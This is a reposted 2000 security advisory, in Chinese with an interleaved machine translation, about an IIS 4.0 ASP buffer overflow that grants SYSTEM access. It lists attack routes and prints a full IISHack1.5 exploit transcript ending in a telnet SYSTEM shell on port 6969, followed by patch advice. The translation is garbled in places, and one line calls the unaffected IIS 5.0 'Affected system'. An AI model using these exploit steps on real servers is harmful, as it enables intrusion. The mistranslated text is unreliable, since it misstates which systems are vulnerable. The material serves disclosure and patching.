发布日期: 2000-11-6 更新日期: 2000-11-6 Release Date: 2000-11-6 Updated: 2000-11-6
受影响的系统: The affected system:
Microsoft IIS 4.0 sp6 Microsoft IIS 4.0 sp6
- Microsoft Windows NT 4.0 - Microsoft Windows NT 4.0
不受影响系统: Affected system:
Microsoft IIS 5.0 Microsoft IIS 5.0
- Microsoft Windows 2000 - Microsoft Windows 2000
描述: Description:
Microsoft IIS 4.0的.ASP ISAPI文件扩展处理机制中存在一个缓冲区溢出漏洞,可能被用来获取SYSTEM级别的访问权限。 Microsoft IIS 4.0 for. ASP ISAPI extension handling mechanism in the file there is a buffer overflow vulnerability that could be used to obtain SYSTEM-level access.
溢出发生在对Java Script中"LANGUAGE"变量的处理中,如果提供一个很长的字符串给"LANGUAGE"变量,将导致IIS(inetinfo.exe)发生溢出。 Overflow occurs in the Java Script in "LANGUAGE" variable processing, if a long string to the "LANGUAGE" variable, will cause IIS (inetinfo.exe) overflow. 下面是一个例子.asp文件: Here is an example. Asp file:
... ...
.. ..
如果[buffer]包含2220个或者更多的字符,将导致溢出发生。 If the [buffer] containing 2220 or more characters will cause an overflow occurs. 这可能使攻击者获取SYSTEM级别的权限。 This could allow an attacker to obtain SYSTEM-level privileges.
这个漏洞是一个本地漏洞,需要攻击者提供一个恶意的asp文件来发动攻击。 This vulnerability is a local vulnerability, a malicious attacker needs the asp file to launch attacks. 然而,只要攻击者可以上传asp文件,也可以从远程发起攻击。 However, as long as the attacker can upload asp file, you can attack from a distance. 例如: For example:
1. 对于提供虚拟主机或者asp上传的站点。 1 for providing a virtual host or upload asp site. 攻击者只需上传一个恶意的asp文件。 An attacker can simply upload a malicious asp file. 就可以远程获取SYSTEM权限。 SYSTEM privileges on remote access.
2. 某些留言板或者BBS程序允许用户输入Java Script脚本。 (2) some message board or BBS program allows the user to enter Java Script scripts. 攻击者就可以在留言中输入包含恶意代码的Java Script语句,远程入侵系统。 Attacker can enter the message contains a malicious Java Script code statements, remote intrusion system.
3. 利用IIS unicode漏洞,攻击者可以远程在受影响系统上创建恶意asp文件并发动溢出攻击。 3 use IIS unicode vulnerability, an attacker can remotely on the affected system to create and launch malicious asp file overflow attacks.
<*来源:eEye Digital Security ( info@eEye.com) <* Source: eEye Digital Security (info@eEye.com)
URL: http://www.eEye.com URL: http://www.eEye.com
*> *>
测试程序: Test procedure:
警告 Warning
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。 The following procedures (methods) may carry offensive, for security research and teaching purposes. 使用者风险自负! Users own risk!
eEye.com提供了一份测试代码: eEye.com provided a test code:
http://www.eEye.com/html/advisories/IISHack1.5.zip http://www.eEye.com/html/advisories/IISHack1.5.zip
测试实例: Test Case:
C:\we are still hiring good programmers> iishack1.5.exe C: \ we are still hiring good programmers> iishack1.5.exe
IISHack Version 1.5 IISHack Version 1.5
eEye Digital Security eEye Digital Security
http://www.eEye.com http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of eEye Digital Security takes no responsibility for use of
this code. this code.
It is for educational purposes only. It is for educational purposes only.
Usage: IISHack1.5 [server] [server-port] [trojan-port] Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to hire@eeye.com> iishack1.5.exe C: \ send resume to hire@eeye.com> iishack1.5.exe
www.[yourowncompany].com 80 www. [yourowncompany]. com 80
6969 6969
IISHack Version 1.5 IISHack Version 1.5
eEye Digital Security eEye Digital Security
http://www.eEye.com http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of eEye Digital Security takes no responsibility for use of
this code. this code.
It is for educational purposes only. It is for educational purposes only.
Attempting to find an executable directory... Attempting to find an executable directory ...
Trying directory [scripts] Trying directory [scripts]
Executable directory found. [scripts] Executable directory found. [Scripts]
Path to executable directory is [C:\Inetpub\scripts] Path to executable directory is [C: \ Inetpub \ scripts]
Moving cmd.exe from winnt\system32 to Moving cmd.exe from winnt \ system32 to
C:\Inetpub\scripts. C: \ Inetpub \ scripts.
Successfully moved cmd.exe to Successfully moved cmd.exe to
C:\Inetpub\scripts\eeyehack.exe C: \ Inetpub \ scripts \ eeyehack.exe
Sending the exploit... Sending the exploit ...
Exploit sent! Now telnet to www.[yourowncompany].com on Exploit sent! Now telnet to www. [Yourowncompany]. Com on
port 6969 and you port 6969 and you
should get a cmd prompt. should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969 C: \> telnet www. [Yourowncompany]. Com 6969
Trying www.[yourowncompany].com... Trying www. [Yourowncompany]. Com ...
Microsoft(R) Windows NT(TM) Microsoft (R) Windows NT (TM)
(C) Copyright 1985-1996 Microsoft Corp. (C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami C: \ WINNT \ system32> whoami
NT AUTHORITY\SYSTEM NT AUTHORITY \ SYSTEM
建议: Recommendation:
厂商补丁: Manufacturers patch:
微软已经在一些hot fixes中修复了此问题,最新的W3SVC.DLL也已经修复了这个漏洞。 Microsoft has fixed some hot fixes this problem, the latest W3SVC.DLL has fixed the vulnerability. 安装了下列任意一个hotfix都可以修复此漏洞: A hotfix is installed, any of the following can fix this vulnerability:
MS00-080: Patch Available for "Session ID Cookie MS00-080: Patch Available for "Session ID Cookie
Marking" Vulnerability Marking "Vulnerability
MS00-060: Patch Available for "IIS Cross-Site Scripting" MS00-060: Patch Available for "IIS Cross-Site Scripting"
Vulnerabilities Vulnerabilities
MS00-057: Patch Available for "File Permission MS00-057: Patch Available for "File Permission
Canonicalization" Vulnerability Canonicalization "Vulnerability
MS00-030: Patch Available for "Malformed Extension Data MS00-030: Patch Available for "Malformed Extension Data
in URL" Vulnerability in URL "Vulnerability
MS00-023: Patch Available for "Myriad Escaped MS00-023: Patch Available for "Myriad Escaped
Characters" Vulnerability Characters "Vulnerability
MS00-019: Patch Available for "Virtualized UNC Share" MS00-019: Patch Available for "Virtualized UNC Share"
Vulnerability Vulnerability
MS00-018: Patch Available for "Chunked Encoding Post" MS00-018: Patch Available for "Chunked Encoding Post"
Vulnerability Vulnerability
微软安全公告地址: Microsoft Security Bulletin Address:
http://www.microsoft.com/technet/security/current.asp http://www.microsoft.com/technet/security/current.asp
Tidak ada komentar:
Posting Komentar